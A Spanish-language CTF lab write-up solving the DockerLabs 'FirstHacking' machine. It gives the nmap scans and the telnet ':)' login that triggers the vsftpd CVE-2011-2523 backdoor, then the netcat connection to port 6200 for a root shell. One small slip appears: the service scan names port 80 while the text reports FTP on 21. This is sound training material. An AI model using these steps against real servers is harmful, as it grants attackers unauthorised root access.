Ir al contenido

FirstHacking

En este artículo explico cómo resolví el CTF de la máquina virtual FirstHacking. A lo largo del texto, detallo paso a paso las técnicas y herramientas utilizadas para identificar y explotar sus vulnerabilidades.

  • Nombre: FirstHacking
  • Autor: El Pingüino de Mario
  • Nivel de Dificultad: Muy fácil
  • Fecha de creación: 14/06/2024

  1. Descargamos la máquina desde DockerLabs.

  2. Descomprimimos el archivo:

    Ventana de terminal
    unzip FirstHacking.zip
  3. Ejecutamos el script de despliegue:

    Ventana de terminal
    sudo bash auto_deplo.sh FirstHacking.tar

Al iniciar la máquina, se nos proporciona directamente su dirección IP, por lo que no fue necesario realizar un escaneo ARP.

IP asignada

Creamos una carpeta para el proyecto y utilizamos la función mkt que genera automáticamente cuatro subdirectorios: content, exploits, nmap y scripts.

Ventana de terminal
mkdir FirstHacking
cd FirstHacking
mkt

Realizamos un escaneo completo de puertos:

Ventana de terminal
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Extraemos los puertos abiertos:

Ventana de terminal
extractPorts allPorts

Puertos abiertos

Luego, escaneamos los servicios identificados:

Ventana de terminal
nmap -sCV -p80 172.17.0.2 -oN targeted

Servicios detectados

Identificamos el servicio FTP activo en el puerto 21. Procedemos a escanearlo en busca de vulnerabilidades conocidas:

Ventana de terminal
nmap -p21 --script vuln 172.17.0.2

El escaneo revela una backdoor explotable: CVE-2011-2523.

La vulnerabilidad CVE-2011-2523 permite una ejecución remota de comandos (RCE). Al conectarse al servicio FTP y proporcionar :) como nombre de usuario, se activa una shell de administración en el puerto 6200.

Conexión al FTP por telnet:

Ventana de terminal
telnet 172.17.0.2

Usuario: :)

FTP Shell

Conexión a la shell abierta en el puerto 6200 con Netcat:

Ventana de terminal
nc -v 172.17.0.2 6200

No fue necesario realizar ninguna técnica de escalada de privilegios, ya que la shell obtenida se ejecuta directamente como usuario root.

Root acceso

  • La máquina cumple con su objetivo como ejercicio introductorio, siendo de dificultad muy baja.
  • Ideal para familiarizarse con vulnerabilidades clásicas en servicios FTP y el uso de Netcat.